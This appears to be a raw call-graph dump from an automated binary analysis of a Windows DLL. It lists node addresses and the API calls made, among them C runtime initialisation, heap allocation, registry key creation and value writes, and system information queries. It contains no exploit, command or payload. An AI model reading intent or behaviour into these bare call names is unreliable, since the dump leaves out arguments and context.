69dcbe2e 72322->72323 72322->72326 72348 69dcbd29 66 API calls __getptd_noexit 72323->72348 72325 69dcbe34 GetLastError 72325->72326 72326->72202 72327->72202 72328->72241 72329->72247 72330->72249 72331->72260 72332->72244 72333->72268 72334->72291 72335->72295 72336->72302 72338 69dd0ee6 72337->72338 72340 69dd0f01 72337->72340 72339 69dd0ef2 72338->72339 72338->72340 72346 69dcbd29 66 API calls __getptd_noexit 72339->72346 72342 69dd0f14 RtlAllocateHeap 72340->72342 72344 69dd0f3b 72340->72344 72347 69dd1247 _DecodePointerInternal 72340->72347 72342->72340 72342->72344 72343 69dd0ef7 72343->72317 72344->72317 72346->72343 72347->72340 72348->72325 72349 698f8789 72350 698f8799 72349->72350 72351 698f8794 72349->72351 72355 698f868e 72350->72355 72363 698fada3 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 72351->72363 72354 698f87a7 72356 698f869a _raise 72355->72356 72357 698f8737 _raise 72356->72357 72359 698f86e7 ___DllMainCRTStartup 72356->72359 72364 698f8525 72356->72364 72357->72354 72359->72357 72361 698f8525 __CRT_INIT@12 149 API calls 72359->72361 72362 698f8717 72359->72362 72360 698f8525 __CRT_INIT@12 149 API calls 72360->72357 72361->72362 72362->72357 72362->72360 72363->72350 72365 698f8531 _raise 72364->72365 72366 698f8539 72365->72366 72367 698f85b3 72365->72367 72416 698fa9e5 HeapCreate 72366->72416 72369 698f85b9 72367->72369 72370 698f8614 72367->72370 72375 698f85d7 72369->72375 72382 698f8542 _raise 72369->72382 72489 698fa2da 66 API calls _doexit 72369->72489 72371 698f8619 72370->72371 72372 698f8672 72370->72372 72494 698f9a2e TlsGetValue _DecodePointerInternal TlsSetValue 72371->72494 72372->72382 72503 698f9d33 79 API calls __freefls@4 72372->72503 72373 698f853e 72373->72382 72417 698f9da6 GetModuleHandleW 72373->72417 72380 698f85eb 72375->72380 72490 698fa55b 67 API calls ___freetlocinfo 72375->72490 72377 698f861e 72495 698f9f70 72377->72495 72493 698f85fe 70 API calls __mtterm 72380->72493 72382->72359 72384 698f854e __RTC_Initialize 72387 698f8552 72384->72387 72393 698f855e GetCommandLineA 72384->72393 72484 698faa08 HeapDestroy 72387->72484 72388 698f85e1 72491 698f9a67 70 API calls ___freetlocinfo 72388->72491 72389 698f8636 _DecodePointerInternal 72395 698f864b 72389->72395 72392 698f85e6 72492 698faa08 HeapDestroy 72392->72492 72442 698fa8f3 GetEnvironmentStringsW 72393->72442 72398 698f864f 72395->72398 72399 698f8666 72395->72399 72501 698f9aa9 66 API calls 4 library calls 72398->72501 72502 698f8e26 66 API calls 2 library calls 72399->72502 72404 698f8656 GetCurrentThreadId 72404->72382 72405 698f857c 72485 698f9a67 70 API calls ___freetlocinfo 72405->72485 72408 698f8588 72409 698f859c 72408->72409 72468 698fa5b3 72408->72468 72415 698f85a1 72409->72415 72488 698fa55b 67 API calls ___freetlocinfo 72409->72488 72412 698f85b1 72412->72405 72415->72382 72416->72373 72418 698f9dba 72417->72418 72419 698f9dc3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72417->72419 72504 698f9a67 70 API calls ___freetlocinfo 72418->72504 72421 698f9e0d TlsAlloc 72419->72421 72424 698f9e5b TlsSetValue 72421->72424 72426 698f9f1c 72421->72426 72423 698f9dbf 72423->72384 72425 698f9e6c 72424->72425 72424->72426 72505 698fa07d _EncodePointerInternal _EncodePointerInternal __init_pointers _raise __initp_misc_winsig 72425->72505 72426->72384 72428 698f9e71 _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal 72506 698fe872 InitializeCriticalSectionAndSpinCount 72428->72506 72430 698f9eb0 72431 698f9f17 72430->72431 72432 698f9eb4 _DecodePointerInternal 72430->72432 72508 698f9a67 70 API calls ___freetlocinfo 72431->72508 72434 698f9ec9 72432->72434 72434->72431 72435 698f9f70 __calloc_crt 66 API calls 72434->72435 72436 698f9edf 72435->72436 72436->72431 72437 698f9ee7 _DecodePointerInternal 72436->72437 72438 698f9ef8 72437->72438 72438->72431 72439 698f9efc 72438->72439 72507 698f9aa9 66 API calls 4 library calls 72439->72507 72441 698f9f04 GetCurrentThreadId 72441->72426 72443 698fa90f WideCharToMultiByte 72442->72443 72444 698f856e 72442->72444 72446 698fa97c FreeEnvironmentStringsW 72443->72446 72447 698fa944 72443->72447 72455 698fa311 GetStartupInfoW 72444->72455 72446->72444 72509 698f9f26 66 API calls _malloc 72447->72509 72449 698fa94a 72449->72446 72450 698fa952 WideCharToMultiByte 72449->72450 72451 698fa964 72450->72451 72452 698fa970 FreeEnvironmentStringsW 72450->72452 72510 698f8e26 66 API calls 2 library calls 72451->72510 72452->72444 72454 698fa96c 72454->72452 72456 698f9f70 __calloc_crt 66 API calls 72455->72456 72467 698fa32f 72456->72467 72457 698fa4da GetStdHandle 72465 698fa4a4 72457->72465 72458 698f9f70 __calloc_crt 66 API calls 72458->72467 72459 698fa53e SetHandleCount 72460 698f8578 72459->72460 72460->72405 72486 698fa833 95 API calls 3 library calls 72460->72486 72461 698fa4ec GetFileType 72461->72465 72462 698fa424 72463 698fa45b InitializeCriticalSectionAndSpinCount 72462->72463 72464 698fa450 GetFileType 72462->72464 72462->72465 72463->72460 72463->72462 72464->72462 72464->72463 72465->72457 72465->72459 72465->72461 72466 698fa512 InitializeCriticalSectionAndSpinCount 72465->72466 72466->72460 72466->72465 72467->72458 72467->72460 72467->72462 72467->72465 72467->72467 72469 698fa5bc 72468->72469 72473 698fa5c1 _strlen 72468->72473 72511 698fe318 94 API calls __setmbcp 72469->72511 72471 698f8591 72471->72409 72487 698fa0de 77 API calls 4 library calls 72471->72487 72472 698f9f70 __calloc_crt 66 API calls 72476 698fa5f6 _strlen 72472->72476 72473->72471 72473->72472 72474 698fa645 72513 698f8e26 66 API calls 2 library calls 72474->72513 72476->72471 72476->72474 72477 698f9f70 __calloc_crt 66 API calls 72476->72477 72478 698fa66b 72476->72478 72481 698fa682 72476->72481 72512 698fede1 66 API calls _raise 72476->72512 72477->72476 72514 698f8e26 66 API calls 2 library calls 72478->72514 72515 698fb4b8 10 API calls __call_reportfault 72481->72515 72483 698fa68e 72484->72382 72485->72387 72486->72408 72487->72409 72488->72412 72489->72375 72490->72388 72491->72392 72492->72380 72493->72382 72494->72377 72497 698f9f79 72495->72497 72498 698f862a 72497->72498 72499 698f9f97 Sleep 72497->72499 72516 698fd6dc 72497->72516 72498->72382 72498->72389 72500 698f9fac 72499->72500 72500->72497 72500->72498 72501->72404 72502->72382 72503->72382 72504->72423 72505->72428 72506->72430 72507->72441 72508->72426 72509->72449 72510->72454 72511->72473 72512->72476 72513->72471 72514->72471 72515->72483 72517 698fd6e8 72516->72517 72521 698fd703 72516->72521 72518 698fd6f4 72517->72518 72517->72521 72525 698fb570 66 API calls __getptd_noexit 72518->72525 72520 698fd716 RtlAllocateHeap 72520->72521 72524 698fd73d 72520->72524 72521->72520 72521->72524 72526 698fda46 _DecodePointerInternal 72521->72526 72522 698fd6f9 72522->72497 72524->72497 72525->72522 72526->72521 72527 69da830c 72534 69daf821 72527->72534 72590 69da76a7 72534->72590 72591 69da76b3 __EH_prolog3 72590->72591 72624 69dcc0aa 72591->72624 72594 69da7716 72644 69d777af RegOpenKeyExW 72594->72644 72598 69dcc0aa ctype 77 API calls 72599 69da772f GetModuleHandleW 72598->72599 72601 69da776f SetUnhandledExceptionFilter GetCommandLineW 72599->72601 72602 69da7752 GetProcAddress 72599->72602 72652 69d73e77 72601->72652 72602->72601 72603 69da7769 SetThreadStackGuarantee 72602->72603 72603->72601 72605 69da778a 72764 69db9293 GetCommandLineW 72605->72764 72611 69da77c5 72832 69d741d6 72611->72832 72627 69dcc0b4 72624->72627 72626 69da7704 72626->72594 72636 69d77c6e 72626->72636 72627->72626 72630 69dcc0d0 std::exception::exception 72627->72630 72840 69dcbfb3 72627->72840 72857 69dd1247 _DecodePointerInternal 72627->72857 72634 69dcc10e 72630->72634 72858 69dcb1d7 76 API calls __cinit 72630->72858 72631 69dcc118 72860 69dd14aa 72631->72860 72859 69dd13ee 66 API calls std::exception::operator= 72634->72859 72635 69dcc129 72637 69d77c7a __EH_prolog3 72636->72637 72871 69dc8e54 72637->72871 72640 69dc8e54 ctype KiUserExceptionDispatcher 72641 69d77cba 72640->72641 72875 69d77ce8 72641->72875 72643 69d77cd9 ctype 72643->72594 72645 69d777f2 RegCreateKeyExW 72644->72645 72646 69d7785b RegCloseKey 72644->72646 72645->72646 72647 69d7780f 72645->72647 72648 69dcb091 __call_reportfault 5 API calls 72646->72648 73116 69d7787b 72647->73116 72650 69d77874 72648->72650 72650->72598 72651 69d7781a RegSetValueExW RegSetValueExW 72651->72646 72653 69d73e83 __EH_prolog3 72652->72653 72654 69da833e ctype 110 API calls 72653->72654 72655 69d73e9f 72654->72655 72656 69d7419a ctype 72655->72656 72657 69da833e ctype 110 API calls 72655->72657 72656->72605 72658 69d73eca 72657->72658 73192 69da9067 72658->73192 72660 69d73ed6 72661 69dc8f0e ctype RtlFreeHeap 72660->72661 72662 69d73ee5 72661->72662 72663 69da833e ctype 110 API calls 72662->72663 72664 69d73ef3 72663->72664 72665 69da9067 ctype 71 API calls 72664->72665 72666 69d73eff 72665->72666 72667 69dc8f0e ctype RtlFreeHeap 72666->72667 72668 69d73f0e 72667->72668 72669 69da833e ctype 110 API calls 72668->72669 72670 69d73f1c 72669->72670 72671 69da9067 ctype 71 API calls 72670->72671 72672 69d73f28 72671->72672 72673 69dc8f0e ctype RtlFreeHeap 72672->72673 72674 69d73f37 72673->72674 72675 69da833e ctype 110 API calls 72674->72675 72676 69d73f45 72675->72676 72677 69da9067 ctype 71 API calls 72676->72677 72678 69d73f51 72677->72678 72679 69dc8f0e ctype RtlFreeHeap 72678->72679 72680 69d73f60 72679->72680 72681 69da833e ctype 110 API calls 72680->72681 72682 69d73f6e 72681->72682 72683 69da9067 ctype 71 API calls 72682->72683 72684 69d73f7a 72683->72684 72685 69dc8f0e ctype RtlFreeHeap 72684->72685 72686 69d73f89 72685->72686 72687 69da833e ctype 110 API calls 72686->72687 72688 69d73f97 72687->72688 72689 69da9067 ctype 71 API calls 72688->72689 72690 69d73fa3 72689->72690 72691 69dc8f0e ctype RtlFreeHeap 72690->72691 72692 69d73fb2 72691->72692 72693 69da833e ctype 110 API calls 72692->72693 72694 69d73fc0 72693->72694 72695 69da9067 ctype 71 API calls 72694->72695 72696 69d73fcc 72695->72696 72697 69dc8f0e ctype RtlFreeHeap 72696->72697 72698 69d73fdb 72697->72698 72699 69da833e ctype 110 API calls 72698->72699 72700 69d73fe9 72699->72700 72701 69da9067 ctype 71 API calls 72700->72701 72702 69d73ff5 72701->72702 72703 69dc8f0e ctype RtlFreeHeap 72702->72703 72704 69d74004 72703->72704 72705 69da833e ctype 110 API calls 72704->72705 72706 69d74012 72705->72706 72707 69da9067 ctype 71 API calls 72706->72707 72708 69d7401e 72707->72708 72709 69dc8f0e ctype RtlFreeHeap 72708->72709 72710 69d7402d 72709->72710 72711 69da833e ctype 110 API calls 72710->72711 72712 69d7403b 72711->72712 72713 69da9067 ctype 71 API calls 72712->72713 72714 69d74047 72713->72714 72715 69dc8f0e ctype RtlFreeHeap 72714->72715 72716 69d74056 72715->72716 72717 69da833e ctype 110 API calls 72716->72717 72718 69d74064 72717->72718 72719 69da9067 ctype 71 API calls 72718->72719 72720 69d74070 72719->72720 72721 69dc8f0e ctype RtlFreeHeap 72720->72721 72722 69d7407f 72721->72722 72723 69da833e ctype 110 API calls 72722->72723 72724 69d7408d 72723->72724 72725 69da9067 ctype 71 API calls 72724->72725 72726 69d74099 72725->72726 72727 69dc8f0e ctype RtlFreeHeap 72726->72727 72728 69d740a8 72727->72728 72729 69da833e ctype 110 API calls 72728->72729 72730 69d740b6 72729->72730 72731 69da9067 ctype 71 API calls 72730->72731 72732 69d740c2 72731->72732 72733 69dc8f0e ctype RtlFreeHeap 72732->72733 72734 69d740d1 72733->72734 72735 69da833e ctype 110 API calls 72734->72735 72736 69d740df 72735->72736 72737 69da9067 ctype 71 API calls 72736->72737 72738 69d740eb 72737->72738 72739 69dc8f0e ctype RtlFreeHeap 72738->72739 72740 69d740fa 72739->72740 72741 69da833e ctype 110 API calls 72740->72741 72742 69d74108 72741->72742 72743 69da9067 ctype 71 API calls 72742->72743 72744 69d74114 72743->72744 72745 69dc8f0e ctype RtlFreeHeap 72744->72745 72746 69d74123 72745->72746 72747 69da833e ctype 110 API calls 72746->72747 72748 69d74131 72747->72748 72749 69da9067 ctype 71 API calls 72748->72749 72750 69d7413d 72749->72750 72751 69dc8f0e ctype RtlFreeHeap 72750->72751 72752 69d7414c 72751->72752 72753 69da833e ctype 110 API calls 72752->72753 72754 69d7415a 72753->72754 72755 69da9067 ctype 71 API calls 72754->72755 72756 69d74166 72755->72756 72757 69dc8f0e ctype RtlFreeHeap 72756->72757 72758 69d74175 72757->72758 72759 69da833e ctype 110 API calls 72758->72759 72760 69d74183 72759->72760 72761 69da9067 ctype 71 API calls 72760->72761 72762 69d7418f 72761->72762 72763 69dc8f0e ctype RtlFreeHeap 72762->72763 72763->72656 72765 69d73e77 ctype 114 API calls 72764->72765 72766 69db92d0 72765->72766 73237 69d74486 72766->73237 72769 69dc8f0e ctype RtlFreeHeap 72770 69db92f4 72769->72770 72776 69db92f8 72770->72776 73240 69d7423c 111 API calls ctype 72770->73240 72772 69d741a9 ctype 67 API calls 72774 69da7793 72772->72774 72773 69db9320 72775 69d73a16 ctype 111 API calls 72773->72775 72773->72776 72777 69d7420c 72774->72777 72775->72776 72776->72772 72778 69d741d6 111 API calls 72777->72778 72779 69d74216 72778->72779 72780 69d73a16 ctype 111 API calls 72779->72780 72781 69d7422a 72779->72781 72780->72781 72782 69d73a16 72781->72782 72783 69d73a22 __EH_prolog3 72782->72783 72784 69da833e ctype 110 API calls 72783->72784 72785 69d73a36 72784->72785 73321 69da88d1 72785->73321 72788 69dc8eab std::bad_exception::bad_exception 67 API calls 72789 69d73a50 72788->72789 72790 69da88d1 ctype 102 API calls 72789->72790 72791 69d73a62 72790->72791 73328 69da8cd5 72791->73328 72793 69d73a73 73334 69da8c7a 72793->73334 72795 69d73a8f ctype 72796 69da8cd5 ctype 101 API calls 72795->72796 72802 69d73ad6 ctype 72795->72802 72797 69d73abc 72796->72797 72798 69da8c7a ctype 101 API calls 72797->72798 72798->72802 72799 69d73b0c 72801 69d73b1f 72799->72801 72803 69dc8f0e ctype RtlFreeHeap 72799->72803 72800 69dc8f0e ctype RtlFreeHeap 72800->72799 72804 69d73b32 72801->72804 72805 69dc8f0e ctype RtlFreeHeap 72801->72805 72802->72799 72802->72800 72803->72801 72806 69d73b4c 72804->72806 72807 69dc8f0e ctype RtlFreeHeap 72804->72807 72805->72804 72808 69da8cd5 ctype 101 API calls 72806->72808 72810 69d73b52 72806->72810 72807->72806 72809 69d73b6b 72808->72809 73340 69da8a98 72809->73340 72813 69dc8f0e ctype RtlFreeHeap 72810->72813 72815 69d73c74 72813->72815 72817 69dc8f0e ctype RtlFreeHeap 72815->72817 72818 69d73c7f ctype 72817->72818 72818->72611 72819 69d73bf2 72822 69d73c13 72819->72822 72824 69dc8f0e ctype RtlFreeHeap 72819->72824 72820 69da8cd5 ctype 101 API calls 72821 69d73bb6 72820->72821 72823 69da8a98 ctype 67 API calls 72821->72823 72825 69d73c26 72822->72825 72826 69dc8f0e ctype RtlFreeHeap 72822->72826 72828 69d73bda 72823->72828 72824->72822 72827 69d73c39 72825->72827 72829 69dc8f0e ctype RtlFreeHeap 72825->72829 72826->72825 72827->72810 72831 69dc8f0e ctype RtlFreeHeap 72827->72831 72830 69da85bc ctype KiUserExceptionDispatcher 72828->72830 72829->72827 72830->72819 72831->72810 72833 69d73a16 ctype 111 API calls 72832->72833 72835 69d741e9 72833->72835 72834 69d741fa 72837 69d741a9 72834->72837 72835->72834 72836 69d73a16 ctype 111 API calls 72835->72836 72836->72834 73423 69db657a 72837->73423 72841 69dcc030 72840->72841 72846 69dcbfc1 72840->72846 72869 69dd1247 _DecodePointerInternal 72841->72869 72843 69dcc036 72870 69dcbd29 66 API calls __getptd_noexit 72843->72870 72844 69dcbfcc 72844->72846 72863 69dd11f5 66 API calls 2 library calls 72844->72863 72864 69dd1041 66 API calls 8 library calls 72844->72864 72865 69dcd835 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 72844->72865 72846->72844 72848 69dcbfef RtlAllocateHeap 72846->72848 72851 69dcc01c 72846->72851 72855 69dcc01a 72846->72855 72866 69dd1247 _DecodePointerInternal 72846->72866 72848->72846 72849 69dcc028 72848->72849 72849->72627 72867 69dcbd29 66 API calls __getptd_noexit 72851->72867 72868 69dcbd29 66 API calls __getptd_noexit 72855->72868 72857->72627 72858->72634 72859->72631 72861 69dd14df KiUserExceptionDispatcher 72860->72861 72862 69dd14d3 72860->72862 72861->72635 72862->72861 72863->72844 72864->72844 72866->72846 72867->72855 72868->72849 72869->72843 72870->72849 72872 69dc8e58 72871->72872 72873 69d77cad 72871->72873 72899 69dc8e8c 72872->72899 72873->72640 72876 69d77cf4 __EH_prolog3 72875->72876 72902 69da833e 72876->72902 72878 69d77d16 72910 69d77ee4 72878->72910 72880 69d77d25 72918 69dc8f0e 72880->72918 72884 69d77d3d ctype 72885 69dc8f0e ctype RtlFreeHeap 72884->72885 72886 69d77d5c 72885->72886 72887 69d75dd0 113 API calls 72886->72887 72888 69d77d65 ctype 72887->72888 72889 69dc8f0e ctype RtlFreeHeap 72888->72889 72890 69d77d8a ctype 72889->72890 72936 69d75485 72890->72936 72892 69d77daf ctype 72893 69dc8f0e ctype RtlFreeHeap 72892->72893 72894 69d77dd4 72893->72894 72946 69d7575e 72894->72946 72896 69d77ddd ctype 72897 69dc8f0e ctype RtlFreeHeap 72896->72897 72898 69d77e02 ctype 72897->72898 72898->72643 72900 69dd14aa __CxxThrowException@8 KiUserExceptionDispatcher 72899->72900 72901 69dc8ea5 72900->72901 72903 69da834a __EH_prolog3 72902->72903 72904 69dc8e54 ctype KiUserExceptionDispatcher 72903->72904 72905 69da8357 72904->72905 72951 69dafe8a 72905->72951 72908 69da8371 ctype 72908->72878 72911 69d77ef0 __EH_prolog3 72910->72911 73034 69dc8eab 72911->73034 72916 69dc8f0e ctype RtlFreeHeap 72917 69d77f26 ctype 72916->72917 72917->72880 72919 69dc8f1d 72918->72919 72920 69d77d34 72918->72920 73050 69dd54f2 72919->73050 72922 69d75dd0 72920->72922 72923 69d75ddc __EH_prolog3 72922->72923 73053 69d75c6f 72923->73053 72925 69d75df0 72926 69dc8eab std::bad_exception::bad_exception 67 API calls 72925->72926 72927 69d75e01 72926->72927 73063 69d75e41 72927->73063 72929 69d75e13 72930 69da84b9 ctype 101 API calls 72929->72930 72931 69d75e1c 72930->72931 72932 69dc8f0e ctype RtlFreeHeap 72931->72932 72933 69d75e27 72932->72933 72934 69dc8f0e ctype RtlFreeHeap 72933->72934 72935 69d75e32 ctype 72934->72935 72935->72884 73098 69dd6e1a 72936->73098 72938 69d75491 GetModuleHandleW 72939 69d754a6 72938->72939 72940 69d754b3 GetProcAddress 72938->72940 72941 69da833e ctype 110 API calls 72939->72941 72942 69d754c5 72940->72942 72943 69d754cb GetNativeSystemInfo 72940->72943 72945 69d754b1 ctype 72941->72945 72942->72943 73099 69d74ea3 72943->73099 72945->72892 73110 69d75727 GetModuleHandleW 72946->73110 72950 69d7578e 72950->72896 72952 69da8364 72951->72952 72953 69dafe96 72951->72953 72952->72908 72955 69dc8c76 72952->72955 72953->72952 72959 69da8b33 110 API calls ctype 72953->72959 72956 69dc8c84 ctype 72955->72956 72960 69dc8bdc 72956->72960 72959->72952 72961 69dc8be9 72960->72961 72962 69dc8bf0 72960->72962 72981 69dc8b95 KiUserExceptionDispatcher RtlFreeHeap ctype 72961->72981 72964 69dc8c02 72962->72964 72965 69dc8e8c ctype KiUserExceptionDispatcher 72962->72965 72975 69dc8d91 72964->72975 72965->72964 72968 69dc8c1d 72982 69dcb6ef 66 API calls 2 library calls 72968->72982 72969 69dc8c31 72983 69dcb1f3 72969->72983 72972 69dc8c2f 72992 69dc8dcd 72972->72992 72974 69dc8bee 72974->72908 72976 69dc8d9c 72975->72976 72977 69dc8da6 72975->72977 72978 69dc8e8c ctype KiUserExceptionDispatcher 72976->72978 72979 69dc8c14 72977->72979 73006 69dc8d3a 72977->73006 72978->72977 72979->72968 72979->72969 72981->72974 72982->72972 72986 69dcb204 _memset 72983->72986 72989 69dcb200 _memmove 72983->72989 72984 69dcb20a 73029 69dcbd29 66 API calls __getptd_noexit 72984->73029 72986->72984 72987 69dcb24f 72986->72987 72986->72989 72987->72989 73031 69dcbd29 66 API calls __getptd_noexit 72987->73031 72989->72972 72991 69dcb20f 73030 69dcecf4 11 API calls __close 72991->73030 72993 69dc8dd1 72992->72993 72994 69dc8dd8 72993->72994 72995 69dc8e8c ctype KiUserExceptionDispatcher 72993->72995 72994->72974 72997 69dc8dee 72995->72997 72998 69dc8e8c ctype KiUserExceptionDispatcher 72997->72998 72999 69dc8e27 72997->72999 73032 69dcb4c9 66 API calls _vwprintf 72997->73032 72998->72997 73000 69dc8d91 ctype 70 API calls 72999->73000 73001 69dc8e2d 73000->73001 73033 69dcb446 97 API calls swprintf 73001->73033 73003 69dc8e3d 73004 69dc8dcd ctype 101 API calls 73003->73004 73005 69dc8e49 73004->73005 73005->72974 73007 69dc8d4b 73006->73007 73008 69dc8d53 73007->73008 73011 69dc8d5c 73007->73011 73013 69dc8c9e 73008->73013 73010 69dc8d5a 73010->72979 73011->73010 73023 69dc8d0b 73011->73023 73014 69dc8cba 73013->73014 73022 69dd563e RtlAllocateHeap 73014->73022 73015 69dc8cc5 73016 69dc8cd0 73015->73016 73017 69dc77cf std::bad_exception::bad_exception KiUserExceptionDispatcher 73015->73017 73018 69dcb1f3 _memcpy_s 66 API calls 73016->73018 73017->73016 73019 69dc8ce9 73018->73019 73020 69dc8f0e ctype RtlFreeHeap 73019->73020 73021 69dc8cfa 73020->73021 73021->73010 73022->73015 73024 69dc8d25 73023->73024 73025 69dc8d17 73023->73025 73026 69dc77cf std::bad_exception::bad_exception KiUserExceptionDispatcher 73024->73026 73027 69dc8d2f 73024->73027 73025->73024 73028 69dd56a7 RtlReAllocateHeap 73025->73028 73026->73027 73027->73010 73028->73024 73029->72991 73030->72989 73031->72991 73032->72997 73033->73003 73037 69dc8eb8 73034->73037 73035 69d77f06 73040 69da84b9 73035->73040 73036 69dc8ee5 73039 69dcb1f3 _memcpy_s 66 API calls 73036->73039 73037->73035 73037->73036 73049 69dc77cf KiUserExceptionDispatcher ctype std::bad_exception::bad_exception 73037->73049 73039->73035 73041 69da84c8 73040->73041 73042 69d77f1e 73040->73042 73043 69da84ea 73041->73043 73044 69da84d5 73041->73044 73042->72916 73045 69dc8bdc ctype 101 API calls 73043->73045 73046 69dc8eab std::bad_exception::bad_exception 67 API calls 73044->73046 73045->73042 73047 69da84da 73046->73047 73048 69dc8f0e ctype RtlFreeHeap 73047->73048 73048->73042 73049->73036 73051 69dd54fd RtlFreeHeap 73050->73051 73052 69dd550b 73050->73052 73051->73052 73052->72920 73055 69d75c7b __EH_prolog3 73053->73055 73054 69d75cb4 73057 69d75cc6 GetModuleFileNameW 73054->73057 73058 69dc8e8c ctype KiUserExceptionDispatcher 73054->73058 73055->73054 73056 69dc8d3a ctype 70 API calls 73055->73056 73056->73054 73059 69da833e ctype 110 API calls 73057->73059 73058->73057 73060 69d75ce8 73059->73060 73061 69dc8f0e ctype RtlFreeHeap 73060->73061 73062 69d75cf0 ctype 73061->73062 73062->72925 73064 69d75e4d __EH_prolog3 73063->73064 73065 69da833e ctype 110 API calls 73064->73065 73066 69d75e66 73065->73066 73067 69dc8eab std::bad_exception::bad_exception 67 API calls 73066->73067 73068 69d75e77 PathFindFileNameW 73067->73068 73069 69d75e8e PathFindExtensionW 73068->73069 73071 69d75eab 73069->73071 73084 69da89f0 73071->73084 73076 69da84b9 ctype 101 API calls 73077 69d75ee2 73076->73077 73078 69dc8f0e ctype RtlFreeHeap 73077->73078 73079 69d75eed 73078->73079 73080 69dc8f0e ctype RtlFreeHeap 73079->73080 73081 69d75ef8 73080->73081 73082 69dc8f0e ctype RtlFreeHeap 73081->73082 73083 69d75f03 ctype 73082->73083 73083->72929 73085 69da8a15 ctype 67 API calls 73084->73085 73086 69d75ec4 73085->73086 73087 69da8a15 73086->73087 73088 69da8a2a 73087->73088 73089 69da8a6d 73088->73089 73091 69da8a3d 73088->73091 73090 69dc8e8c ctype KiUserExceptionDispatcher 73089->73090 73092 69da8a77 ctype 73090->73092 73091->73092 73093 69da8a5b 73091->73093 73097 69dafeb7 67 API calls 3 library calls 73092->73097 73095 69dc8eab std::bad_exception::bad_exception 67 API calls 73093->73095 73096 69d75ed9 73095->73096 73096->73076 73097->73096 73098->72938 73104 69d74fd5 73099->73104 73102 69da833e ctype 110 API calls 73103 69d74f56 73102->73103 73103->72945 73105 69d74ffd 73104->73105 73108 69d75085 GetSystemMetrics 73105->73108 73109 69d75001 73105->73109 73106 69dcb091 __call_reportfault 5 API calls 73107 69d74eb2 73106->73107 73107->73102 73108->73109 73109->73106 73111 69d75755 73110->73111 73112 69d7573b GetProcAddress 73110->73112 73115 69d75847 110 API calls 2 library calls 73111->73115 73113 69d7574e GetSystemInfo 73112->73113 73114 69d7574b 73112->73114 73113->73111 73114->73113 73115->72950 73117 69d77887 __EH_prolog3 73116->73117 73118 69d7789e RegOpenKeyExW 73117->73118 73121 69d77938 ctype 73117->73121 73119 69d778c2 RegQueryValueExW RegCloseKey 73118->73119 73120 69d77908 SHGetFolderPathW 73118->73120 73119->73120 73122 69d778ef GetFileAttributesW 73119->73122 73123 69d7793e 73120->73123 73124 69d7791d 73120->73124 73121->72651 73122->73120 73125 69d77900 73122->73125 73148 69d75d3f 73123->73148 73139 69dcb8ad 73124->73139 73125->73121 73129 69d77930 GetFileAttributesW 73129->73121 73129->73123 73130 69d7795e 73161 69da8e8b 73130->73161 73133 69dc8f0e ctype RtlFreeHeap 73134 69d7797c 73133->73134 73167 69dcb927 73134->73167 73137 69d77991 73138 69dc8f0e ctype RtlFreeHeap 73137->73138 73138->73121 73140 69dcb8c2 73139->73140 73142 69dcb8bb 73139->73142 73176 69dcbd29 66 API calls __getptd_noexit 73140->73176 73142->73140 73144 69dcb8f7 73142->73144 73145 69d77929 73144->73145 73178 69dcbd29 66 API calls __getptd_noexit 73144->73178 73145->73123 73145->73129 73147 69dcb8c7 73177 69dcecf4 11 API calls __close 73147->73177 73149 69d75d4b __EH_prolog3 73148->73149 73150 69d75d8c GetModuleFileNameW 73149->73150 73151 69dc8d3a ctype 70 API calls 73149->73151 73179 69dc8afc 73150->73179 73153 69d75d89 73151->73153 73153->73150 73155 69da833e ctype 110 API calls 73156 69d75dad 73155->73156 73184 69da8f73 73156->73184 73159 69dc8f0e ctype RtlFreeHeap 73160 69d75dc0 ctype 73159->73160 73160->73130 73162 69da8ea9 73161->73162 73163 69da8eb0 PathCombineW 73161->73163 73164 69dc8d3a ctype 70 API calls 73162->73164 73165 69dc8afc ctype KiUserExceptionDispatcher 73163->73165 73164->73163 73166 69d77971 73165->73166 73166->73133 73168 69dcb93c 73167->73168 73169 69dcb935 73167->73169 73189 69dcbd29 66 API calls __getptd_noexit 73168->73189 73169->73168 73174 69dcb95d 73169->73174 73171 69dcb941 73190 69dcecf4 11 API calls __close 73171->73190 73173 69d77986 GetFileAttributesW 73173->73137 73174->73173 73191 69dcbd29 66 API calls __getptd_noexit 73174->73191 73176->73147 73177->73145 73178->73147 73180 69dc8b01 _wcsnlen 73179->73180 73181 69d75da4 73180->73181 73182 69dc8e8c ctype KiUserExceptionDispatcher 73180->73182 73181->73155 73183 69dc8b34 73182->73183 73185 69dc8d91 ctype 70 API calls 73184->73185 73186 69da8f83 PathRemoveFileSpecW 73185->73186 73187 69dc8afc ctype KiUserExceptionDispatcher 73186->73187 73188 69d75db8 73187->73188 73188->73159 73189->73171 73190->73173 73191->73171 73193 69da9073 __EH_prolog3 73192->73193 73194 69da90b5 73193->73194 73195 69da9094 73193->73195 73197 69dc8e8c ctype KiUserExceptionDispatcher 73193->73197 73196 69dc8eab std::bad_exception::bad_exception 67 API calls 73194->73196 73198 69da90db ctype 73194->73198 73195->73198 73200 69dcbe92 73195->73200 73196->73198 73197->73195 73198->72660 73201 69dcbebc 73200->73201 73202 69dcbea1 73200->73202 73204 69dcbed1 73201->73204 73231 69dce733 67 API calls __close 73201->73231 73202->73201 73203 69dcbead 73202->73203 73230 69dcbd29 66 API calls __getptd_noexit 73203->73230 73209 69dd0f64 73204->73209 73208 69dcbeb2 _memset 73208->73194 73210 69dd0f6f 73209->73210 73211 69dd0f7a 73209->73211 73212 69dcbfb3 _malloc 66 API calls 73210->73212 73213 69dd0f82 73211->73213 73221 69dd0f8f 73211->73221 73214 69dd0f77 73212->73214 73215 69dcbe0e _free 66 API calls 73213->73215 73214->73208 73229 69dd0f8a __dosmaperr 73215->73229 73216 69dd0fc7 73233 69dd1247 _DecodePointerInternal 73216->73233 73218 69dd0f97 RtlReAllocateHeap 73218->73221 73218->73229 73219 69dd0fcd 73234 69dcbd29 66 API calls __getptd_noexit 73219->73234 73220 69dd0ff7 73236 69dcbd29 66 API calls __getptd_noexit 73220->73236 73221->73216 73221->73218 73221->73220 73226 69dd0fdf 73221->73226 73232 69dd1247 _DecodePointerInternal 73221->73232 73225 69dd0ffc GetLastError 73225->73229 73235 69dcbd29 66 API calls __getptd_noexit 73226->73235 73228 69dd0fe4 GetLastError 73228->73229 73229->73208 73230->73208 73231->73204 73232->73221 